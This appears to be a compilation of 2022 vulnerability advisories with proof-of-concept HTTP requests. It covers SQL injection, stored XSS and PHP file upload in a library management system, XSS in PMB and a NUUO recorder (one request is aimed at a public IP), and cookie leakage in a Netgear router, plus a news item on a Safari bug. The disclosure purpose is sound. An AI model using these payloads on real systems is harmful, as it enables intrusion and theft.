Library Management System with QR Code version 1.0 suffers from a remote SQL injection vulnerability.

    #### Title: Library Management System with QR code Attendance 1.0 SQLInjection#### Author: Ashish Kumar (https://www.linkedin.com/in/ashish-kumar-0b65a3184)#### Date: 27.06.2022#### Vendor: https://www.sourcecodester.com/users/kingbhob02#### Software:https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html#### Version: 1.0#### Reference:https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/Sql%20Injection/POC.md#### Description：##### The reason for the SQL injection vulnerability is that the websiteapplication does not verify the validity of the data submitted by the userto the server (type, length, business parameter validity, etc.), and doesnot effectively filter the data input by the user with special characters ,so that the user's input is directly brought into the database forexecution, which exceeds the expected result of the original design of theSQL statement, resulting in a SQL injection vulnerability.LibraryManagement System with QR code Attendance does not filter the contentcorrectly at the "bookdetails.php" id parameter, resulting in thegeneration of SQL injection.#### Payload used:`' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB`#### POC1.  Login into the CMS.Admin Default Access:Username: adminPassword: admin2. http://localhost/LMS/librarian/bookdetails.php?id=1913. Put sleep(5) payload (`' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)--PbtB`)4. `http://localhost:80/LMS/librarian/bookdetails.php?id=' AND (SELECT 9198FROM (SELECT(SLEEP(5)))iqZA)-- PbtB`5. code```GET/LMS/librarian/bookdetails.php?id=%27%20AND%20(SELECT%209198%20FROM%20(SELECT(SLEEP(5)))iqZA)--%20PbtBHTTP/1.1Host: localhostsec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pcoConnection: close```

Library Management System With QR Code 1.0 SQL Injection

Library Management System with QR Code version 1.0 suffers from a persistent cross site scripting vulnerability.

    #### Title: Library Management System with QR code Attendance 1.0 StoredCross-Site Scripting#### Author: Ashish Kumar (https://www.linkedin.com/in/ashish-kumar-0b65a3184)#### Date: 27.06.2022#### Vendor: https://www.sourcecodester.com/users/kingbhob02#### Software:https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html#### Version: 1.0#### Reference:https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/Cross%20Site%20Scripting(Stored)/POC.md#### Description：#### Library Management System with QR code Attendance is vulnerable toStored cross-site scripting on the profile edit page. The "Name" parameterin 'http://localhost/LMS/admin/edit_admin_details.php' is vulnerable.#### Impact: An attacker could steal cookies with a crafted URL sent to the victims.### POC```POST /LMS/admin/edit_admin_details.php?id=admin HTTP/1.1Host: localhostContent-Length: 115Cache-Control: max-age=0sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/LMS/admin/edit_admin_details.phpAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pcoConnection: closeName=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&EmailId=admin%40gmail.com&MobNo=0&Password=admin&submit=```

Library Management System With QR Code 1.0 Cross Site Scripting

Library Management System with QR Code version 1.0 suffers from a remote shell upload vulnerability.

    #### Title: Library Management System with QR code Attendance_File UploadRCE#### Author: Ashish Kumar (https://www.linkedin.com/in/ashish-kumar-0b65a3184)#### Date: 27.06.2022#### Vendor: https://www.sourcecodester.com/users/kingbhob02#### Software:https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html#### Version: 1.0#### Reference:https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/File_Upload/POC.md#### Description：#### At the file upload function, the application system checks thevalidity of the file type, format, and content uploaded by the user, sothat attackers can upload Webshell (.php, .jsp, asp, etc.) malicious scriptfiles or files in unexpected formats, such as: HTML files, SHTML files,etc., at the same time, you can use characters such as directory jump orcontrol the upload directory to directly upload files to the Web directoryor any directory, which may lead to the execution of arbitrary maliciousscript files on the remote server, thereby directly obtaining applicationsystem permissions.#### $uploaddir = 'assets/uploads/';#### $uploadfile = $uploaddir . basename($_FILES['image']['name']);#### Payload used:`<?php phpinfo();?>`### POC```POST /LMS/card/index.php HTTP/1.1Host: localhostContent-Length: 1056Cache-Control: max-age=0sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1Origin: http://localhostContent-Type: multipart/form-data;boundary=----WebKitFormBoundaryngJP5BxPA6UsA91OUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36(KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36Accept:text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9Sec-Fetch-Site: same-originSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentReferer: http://localhost/LMS/card/index.phpAccept-Encoding: gzip, deflateAccept-Language: en-GB,en-US;q=0.9,en;q=0.8Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pcoConnection: close------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="name"File_Upload------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="grade"Computer Studies------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="dob"Student------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="address"Testing Testing------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="email"ashish@cyberthoth.in------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="exp_date"1990-02-11------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="id_no"8529637------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="phone"1212121212------WebKitFormBoundaryngJP5BxPA6UsA91OContent-Disposition: form-data; name="image"; filename="File_upload.php"Content-Type: application/octet-stream<?php phpinfo();?>------WebKitFormBoundaryngJP5BxPA6UsA91O--```#### Access below URL:`http://localhost/LMS/card/assets/uploads/File_upload.php`![image](https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/File_Upload/POC.png)

Library Management System With QR Code 1.0 Shell Upload

A vulnerability was found in SourceCodester Library Management System 1.0. It has been classified as critical. Affected is an unknown function of the component /card/index.php. The manipulation of the argument image leads to unrestricted upload. It is possible to launch the attack remotely. The exploit has been disclosed to the public and may be used.

**Title: Library Management System with QR code Attendance\_File Upload RCE****Author: Ashish Kumar (https://www.linkedin.com/in/ashish-kumar-0b65a3184)****Date: 27.06.2022****Vendor: https://www.sourcecodester.com/users/kingbhob02****Software: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html****Version: 1.0****Reference: https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/File\_Upload/POC.md****Description：****At the file upload function, the application system checks the validity of the file type, format, and content uploaded by the user, so that attackers can upload Webshell (.php, .jsp, asp, etc.) malicious script files or files in unexpected formats, such as: HTML files, SHTML files, etc., at the same time, you can use characters such as directory jump or control the upload directory to directly upload files to the Web directory or any directory, which may lead to the execution of arbitrary malicious script files on the remote server, thereby directly obtaining application system permissions.****$uploaddir = 'assets/uploads/';****$uploadfile = $uploaddir . basename($\_FILES\['image'\]\['name'\]);****Payload used:**

<?php phpinfo();?>

**POC**

    POST /LMS/card/index.php HTTP/1.1
    Host: localhost
    Content-Length: 1056
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryngJP5BxPA6UsA91O
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/LMS/card/index.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
    Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pco
    Connection: close
    
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="name"
    
    File_Upload
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="grade"
    
    Computer Studies
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="dob"
    
    Student
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="address"
    
    Testing Testing
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="email"
    
    ashish@cyberthoth.in
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="exp_date"
    
    1990-02-11
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="id_no"
    
    8529637
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="phone"
    
    1212121212
    ------WebKitFormBoundaryngJP5BxPA6UsA91O
    Content-Disposition: form-data; name="image"; filename="File_upload.php"
    Content-Type: application/octet-stream
    
    <?php phpinfo();?>
    ------WebKitFormBoundaryngJP5BxPA6UsA91O--
    

**Access below URL:**

http://localhost/LMS/card/assets/uploads/File_upload.php

CVE-2022-2212: CVE/POC.md at main · CyberThoth/CVE

A vulnerability was found in SourceCodester Library Management System 1.0. It has been rated as critical. Affected by this issue is some unknown functionality of the file /librarian/bookdetails.php. The manipulation of the argument id with the input ' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB leads to sql injection. The attack may be launched remotely. The exploit has been disclosed to the public and may be used.

**Title: Library Management System with QR code Attendance 1.0 SQL Injection****Author: Ashish Kumar (https://www.linkedin.com/in/ashish-kumar-0b65a3184)****Date: 27.06.2022****Vendor: https://www.sourcecodester.com/users/kingbhob02****Software: https://www.sourcecodester.com/php/15434/library-management-system-qr-code-attendance-and-auto-generate-library-card.html****Version: 1.0****Reference: https://github.com/CyberThoth/CVE/blob/main/CVE/Library%20Management%20System%20with%20QR%20code%20Attendance/Sql%20Injection/POC.md****Description：****The reason for the SQL injection vulnerability is that the website application does not verify the validity of the data submitted by the user to the server (type, length, business parameter validity, etc.), and does not effectively filter the data input by the user with special characters , so that the user's input is directly brought into the database for execution, which exceeds the expected result of the original design of the SQL statement, resulting in a SQL injection vulnerability.Library Management System with QR code Attendance does not filter the content correctly at the "bookdetails" id parameter, resulting in the generation of SQL injection.****Payload used:**

' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB

**POC**

1.  Login into the CMS. Admin Default Access:

Username: admin

Password: admin

2.  http://localhost/LMS/librarian/bookdetails.php?id=191
    
3.  Put sleep(5) payload (' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB)
    
4.  http://localhost:80/LMS/librarian/bookdetails.php?id=' AND (SELECT 9198 FROM (SELECT(SLEEP(5)))iqZA)-- PbtB
    
5.  code
    

    GET /LMS/librarian/bookdetails.php?id=%27%20AND%20(SELECT%209198%20FROM%20(SELECT(SLEEP(5)))iqZA)--%20PbtB HTTP/1.1
    Host: localhost
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
    Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pco
    Connection: close
    

**line 111 of bookdetails.php invokes a SQL query built with input that comes from an untrusted source. This call could allow an attacker to modify the statement's meaning or to execute arbitrary SQL commands**

CVE-2022-2214: CVE/POC.md at main · CyberThoth/CVE

A vulnerability was found in SourceCodester Library Management System 1.0. It has been declared as problematic. Affected by this vulnerability is an unknown functionality of the file /admin/edit_admin_details.php?id=admin. The manipulation of the argument Name leads to cross site scripting. The attack can be launched remotely. The exploit has been disclosed to the public and may be used.

An attacker could steal cookies with a crafted URL sent to the victims.

    POST /LMS/admin/edit_admin_details.php?id=admin HTTP/1.1
    Host: localhost
    Content-Length: 115
    Cache-Control: max-age=0
    sec-ch-ua: "Chromium";v="97", " Not;A Brand";v="99"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Windows"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/97.0.4692.71 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/LMS/admin/edit_admin_details.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-GB,en-US;q=0.9,en;q=0.8
    Cookie: PHPSESSID=0r78mi76ub6k55p8mkce7f4pco
    Connection: close
    
    Name=%3Cscript%3Ealert%28document.cookie%29%3C%2Fscript%3E&EmailId=admin%40gmail.com&MobNo=0&Password=admin&submit=

CVE-2022-2213: CVE/POC.md at main · CyberThoth/CVE

PMB 7.3.10 allows reflected XSS via the id parameter in an lvl=author_see request to index.php.

**PMB 7.3.10 - CVE-2022-34328**

*   Description : Allow attacker to inject arbitrary malicious HTML or Javascripts code in user web browser
*   Affected version : 7.3.10 >=

**Information**

To make this PoC, I just installed the software (https://forge.sigb.net/projects/pmb/files)

*   Vulnerability Type : XSS Reflected ( Unauthentificated )

**POC**

There is an exemple with alert:

    GET /index.php?lvl=author_see&id=42691%27%7cecho%20%3E%3C/a%3E%3C/span%3E%3Cscript%3Ealert(1)%3C/script%3Ed5u3g%20ijwh7gefly%20%23xzwx HTTP/1.1
    Host: xxxxx.fr
    Cookie: PhpMyBibli-OPACDB=pmb_test; _ga=GA1.2.80710046205; __utmz=147501360.tmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=147501632.2; PhpMyBibli-COOKIECONSENT=!pmbstatopac=true
    Sec-Ch-Ua: "(Not(A:Brand";v="8", "Chromium";v="101"
    Sec-Ch-Ua-Mobile: ?0
    Sec-Ch-Ua-Platform: "Linux"
    Upgrade-Insecure-Requests: 1
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/101.0.4951.54 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: none
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Accept-Encoding: gzip, deflate
    Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
    Connection: close
    

**Preview**

**PMB 7.4.1 - CVE-XXX**

*   Description : Allow attacker to inject arbitrary malicious HTML or Javascripts code in user web browser by body parameter from POST request
*   Affected version : 7.4.1 (lasted)

**Information**

To make this PoC, I just installed the software (https://forge.sigb.net/projects/pmb/files)

*   Vulnerability Type : XSS Reflected ( Unauthentificated )

**POC**

There is an exemple with alert:

    POST /pmb/opac_css/index.php?lvl=search_result&search_type_asked=extended_search HTTP/1.1
    Host: localhost
    Content-Length: 165
    Cache-Control: max-age=0
    sec-ch-ua: "-Not.A/Brand";v="8", "Chromium";v="102"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Linux"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/pmb/opac_css/index.php?lvl=index&search_type_asked=extended_search
    Accept-Encoding: gzip, deflate
    Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
    Cookie: PhpMyBibli-OPACDB=bibli; PmbOpac-SESSNAME=PmbOpac; PmbOpac-SESSID=2044540279; PhpMyBibli-OPACDB=bibli; PhpMyBibli-DATABASE=bibli; rwtxt-domains=",68qr7xelmc"; PHPSESSID=gqhnot1fc67bn5he0bflumrbh7; pmb3619056675=gr56m1hb6qesp47kqnsfpf8qn6
    Connection: close
    
    add_field=&search%5B%5D=f_1&op_0_f_1=EXACT&field_0_f_1%5B%5D=gang&explicit_search=1&search_xml_file=search_fields&delete_field=&launch_search=1&page=&no_search=0&ij6fm%22%3e%3cscript%3ealert(1)%3c%2fscript%3evg9q6c4g1mk=1
    

**PMB 7.4.1 - CVE-XXX**

*   Description : Allow attacker to inject arbitrary malicious HTML or Javascripts code in user web browser by body parameter from POST request
*   Affected version : 7.4.1 (lasted)

**Information**

To make this PoC, I just installed the software (https://forge.sigb.net/projects/pmb/files)

*   Vulnerability Type : XSS Stored ( Authentificated )

**POC**

There is an exemple with alert:

    POST /pmb/admin.php?categ=cms_editorial&sub=type&elem=article&action=save&id=3 HTTP/1.1
    Host: localhost
    Content-Length: 229
    Cache-Control: max-age=0
    sec-ch-ua: "-Not.A/Brand";v="8", "Chromium";v="102"
    sec-ch-ua-mobile: ?0
    sec-ch-ua-platform: "Linux"
    Upgrade-Insecure-Requests: 1
    Origin: http://localhost
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/102.0.5005.63 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Sec-Fetch-Site: same-origin
    Sec-Fetch-Mode: navigate
    Sec-Fetch-User: ?1
    Sec-Fetch-Dest: document
    Referer: http://localhost/pmb/admin.php?categ=cms_editorial&sub=type&elem=article&action=edit&id=3
    Accept-Encoding: gzip, deflate
    Accept-Language: fr-FR,fr;q=0.9,en-US;q=0.8,en;q=0.7
    Cookie: PhpMyBibli-OPACDB=bibli; PhpMyBibli-DATABASE=bibli; PhpMyBibli-LOGIN=admin; PhpMyBibli-SESSNAME=PhpMyBibli; PhpMyBibli-SESSID=4768651558; filesTreeSaveStateCookie=0.506966344966034%2C0.506966344966034%2F0.20485223066281089%2C0.506966344966034%2F0.21127644710407156%2F0.07588620749494357%2F0.5386964886336061%2C0.506966344966034%2F0.21127644710407156%2F0.07588620749494357%2F0.5386964886336061%2F0.5524361244924687%2C0.506966344966034%2F0.21127644710407156%2F0.07588620749494357%2F0.5386964886336061%2F0.5524361244924687%2F0.5604307111281486%2C0.506966344966034%2F0.21127644710407156%2F0.07588620749494357%2F0.5386964886336061%2F0.5524361244924687%2F0.5604307111281486%2F0.9885325597889434%2C0.506966344966034%2F0.21127644710407156%2F0.29958385610940796%2C0.506966344966034%2F0.20485223066281089%2F0.13827414385022663%2C0.506966344966034%2F0.20485223066281089%2F0.13827414385022663%2F0.5519183400871519%2C0.506966344966034%2F0.20485223066281089%2F0.13827414385022663%2F0.14825971714188912%2C0.506966344966034%2F0.20485223066281089%2F0.5972892199220485; rwtxt-domains=",68qr7xelmc"; PHPSESSID=gqhnot1fc67bn5he0bflumrbh7; pmb3619056675=gr56m1hb6qesp47kqnsfpf8qn6; pmb4768651558=oj4vh2ag1b0eonnsirg5rmvn09
    Connection: close
    
    cms_editorial_type_label=%3Cscript%3Ealert%281%29%3C%2Fscript%3E&cms_editorial_type_comment=%3Cscript%3Ealert%282%29%3C%2Fscript%3E&cms_editorial_type_page_selector=0&cms_editorial_type_page_var_selector=0&save_button=Enregistrer
    

**Preview**

CVE-2022-34328: GitHub - jenaye/PMB

NUUO Network Video Recorder NVRsolo v03.06.02 was discovered to contain a reflected cross-site scripting (XSS) vulnerability via login.php.

    "><script>alert("XSS")</script><"
    

    POST /login.php HTTP/1.1
    Host: 218.253.76.122:8000
    Content-Length: 45
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://218.253.76.122:8000
    Content-Type: application/x-www-form-urlencoded
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.212 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: "><script>alert("XSS")</script><"
    Accept-Encoding: gzip, deflate
    Accept-Language: zh-CN,zh;q=0.9
    Cookie: lang=en; PHPSESSID=b630e0a3b454ae69c6aacbe257435b55
    Connection: close
    
    language=11111&user=111&pass=222&submit=Login

CVE-2022-33119: nuuo-xss/README.md at main · badboycxcc/nuuo-xss

A security flaw in Apple Safari that was exploited in the wild earlier this year was originally fixed in 2013 and reintroduced in December 2016, according to a new report from Google Project Zero.
The issue, tracked as CVE-2022-22620 (CVSS score: 8.8), concerns a case of a use-after-free vulnerability in the WebKit component that could be exploited by a piece of specially crafted web content to

A security flaw in Apple Safari that was exploited in the wild earlier this year was originally fixed in 2013 and reintroduced in December 2016, according to a new report from Google Project Zero.

The issue, tracked as CVE-2022-22620 (CVSS score: 8.8), concerns a case of a use-after-free vulnerability in the WebKit component that could be exploited by a piece of specially crafted web content to gain arbitrary code execution.

In early February 2022, Apple shipped patches for the bug across Safari, iOS, iPadOS, and macOS, while acknowledging that it "may have been actively exploited."

"In this case, the variant was completely patched when the vulnerability was initially reported in 2013," Maddie Stone of Google Project Zero said. "However, the variant was reintroduced three years later during large refactoring efforts. The vulnerability then continued to exist for 5 years until it was fixed as an in-the-wild zero-day in January 2022."

While both the 2013 and 2022 bugs in the History API are essentially the same, the paths to trigger the vulnerability are different. Then subsequent code changes undertaken years later revived the zero-day flaw from the dead like a "zombie."

Stating the incident is not unique to Safari, Stone further stressed taking adequate time to audit code and patches to avoid instances of duplicating the fixes and understanding the security impacts of the changes being carried out.

"Both the October 2016 and the December 2016 commits were very large. The commit in October changed 40 files with 900 additions and 1225 deletions. The commit in December changed 95 files with 1336 additions and 1325 deletions," Stone noted.

"It seems untenable for any developers or reviewers to understand the security implications of each change in those commits in detail, especially since they're related to lifetime semantics."

Found this article interesting? Follow THN on Facebook, Twitter __ and LinkedIn to read more exclusive content we post.

Google Researchers Detail 5-Year-Old Apple Safari Vulnerability Exploited in the Wild

netgear wnap320 router WNAP320_V2.0.3_firmware is vulnerable to Incorrect Access Control via /recreate.php, which can leak all users cookies.

Permalink

Cannot retrieve contributors at this time

There is an unauthorized vulnerability in wnap320, located in /recreate.php, which can leak all users' cookie

**http://ip/recreate.php**

    
    
    WNAP320_V2.0.3_firmware
    
    GET /recreate.php?username=admin 
    HTTP/1.1 Host: 192.168.0.100 
    Accept: text/javascript, text/html, application/xml, text/xml, / 
    X-Prototype-Version: 1.6.0.2 
    X-Requested-With: XMLHttpRequest 
    User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.110 Safari/537.36
    Referer: http://192.168.0.100/index.php?page=master 
    Accept-Encoding: gzip, deflate 
    Accept-Language: en-US,en;q=0.9 
    Connection: close
    

**Acknowledgement**

Thanks to the partners who discovered the vulnerability together：

Yi-fei Gao

Tag

#webkit